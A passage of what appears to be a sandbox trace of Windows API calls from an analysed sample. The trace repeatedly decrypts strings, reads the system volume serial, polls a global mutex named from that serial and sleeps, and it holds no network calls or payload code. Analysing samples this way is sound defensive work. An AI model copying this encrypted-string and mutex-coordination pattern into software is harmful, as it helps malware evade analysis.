(in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0140.581] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0140.581] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0140.581] CryptDestroyKey (hKey=0x29c020) returned 1 [0140.581] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0140.581] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0140.581] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0140.581] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0140.581] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.581] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0140.582] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0140.582] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0140.582] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0140.582] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0140.582] CryptDestroyKey (hKey=0x29c020) returned 1 [0140.582] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0140.582] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0140.582] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0140.582] CloseHandle (hObject=0x250) returned 1 [0140.582] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0140.582] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0140.582] Sleep (dwMilliseconds=0x3e8) [0142.056] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0142.056] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0142.056] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0142.057] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0142.057] CryptDestroyKey (hKey=0x29c020) returned 1 [0142.057] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0142.057] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0142.057] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0142.057] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0142.057] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0142.057] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0142.057] CryptDestroyKey (hKey=0x29c020) returned 1 [0142.057] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0142.057] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0142.057] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0142.057] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0142.057] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.057] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0142.057] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0142.057] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0142.057] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0142.057] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0142.057] CryptDestroyKey (hKey=0x29c020) returned 1 [0142.057] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0142.057] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0142.057] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0142.058] CloseHandle (hObject=0x1c0) returned 1 [0142.058] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0142.058] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0142.058] Sleep (dwMilliseconds=0x3e8) [0143.886] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0143.886] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0143.886] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0143.886] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0143.886] CryptDestroyKey (hKey=0x29c020) returned 1 [0143.886] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0143.886] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0143.886] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0143.886] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0143.886] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0143.886] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0143.886] CryptDestroyKey (hKey=0x29c020) returned 1 [0143.886] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0143.886] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0143.886] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0143.886] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0143.886] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.886] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0143.887] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0143.887] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0143.887] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0143.887] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0143.887] CryptDestroyKey (hKey=0x29c020) returned 1 [0143.887] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0143.887] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0143.887] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0143.887] CloseHandle (hObject=0x1c0) returned 1 [0143.887] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0143.887] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0143.887] Sleep (dwMilliseconds=0x3e8) [0145.249] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0145.249] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0145.249] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0145.249] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0145.249] CryptDestroyKey (hKey=0x29c020) returned 1 [0145.249] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0145.249] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0145.249] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0145.249] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0145.249] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0145.249] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0145.249] CryptDestroyKey (hKey=0x29c020) returned 1 [0145.249] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0145.249] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0145.249] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0145.249] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0145.249] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0145.250] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0145.250] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0145.250] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0145.250] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0145.250] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0145.250] CryptDestroyKey (hKey=0x29c020) returned 1 [0145.250] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0145.250] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0145.250] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0145.250] CloseHandle (hObject=0x1c0) returned 1 [0145.250] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0145.250] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0145.250] Sleep (dwMilliseconds=0x3e8) [0147.384] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0147.384] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0147.384] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0147.384] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0147.384] CryptDestroyKey (hKey=0x29c020) returned 1 [0147.384] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0147.384] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0147.384] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0147.384] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0147.384] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0147.384] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0147.384] CryptDestroyKey (hKey=0x29c020) returned 1 [0147.384] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0147.384] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0147.384] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0147.384] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0147.384] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0147.385] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0147.385] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0147.385] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0147.385] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0147.385] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0147.385] CryptDestroyKey (hKey=0x29c020) returned 1 [0147.385] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0147.385] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0147.385] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0147.385] CloseHandle (hObject=0x1c0) returned 1 [0147.385] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0147.385] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0147.385] Sleep (dwMilliseconds=0x3e8) [0148.478] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0148.478] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0148.478] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0148.478] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0148.478] CryptDestroyKey (hKey=0x29c020) returned 1 [0148.478] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0148.478] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0148.478] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0148.478] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0148.478] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0148.478] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0148.478] CryptDestroyKey (hKey=0x29c020) returned 1 [0148.478] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0148.478] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0148.478] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0148.478] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0148.479] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0148.479] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0148.479] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0148.479] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0148.479] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0148.479] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0148.479] CryptDestroyKey (hKey=0x29c020) returned 1 [0148.479] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0148.479] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0148.479] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0148.479] CloseHandle (hObject=0x1c0) returned 1 [0148.479] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0148.479] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0148.479] Sleep (dwMilliseconds=0x3e8) [0149.944] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0149.944] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0149.944] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0149.945] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0149.945] CryptDestroyKey (hKey=0x29c020) returned 1 [0149.945] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0149.945] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0149.945] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0149.945] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0149.945] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0149.945] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0149.945] CryptDestroyKey (hKey=0x29c020) returned 1 [0149.945] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0149.945] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0149.945] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0149.945] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0149.945] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0149.945] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0149.945] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0149.945] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0149.945] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0149.945] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0149.945] CryptDestroyKey (hKey=0x29c020) returned 1 [0149.945] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0149.945] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0149.945] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0149.945] CloseHandle (hObject=0x1c0) returned 1 [0149.945] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0149.945] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0149.945] Sleep (dwMilliseconds=0x3e8) [0151.346] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0151.348] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0151.348] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0151.348] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: 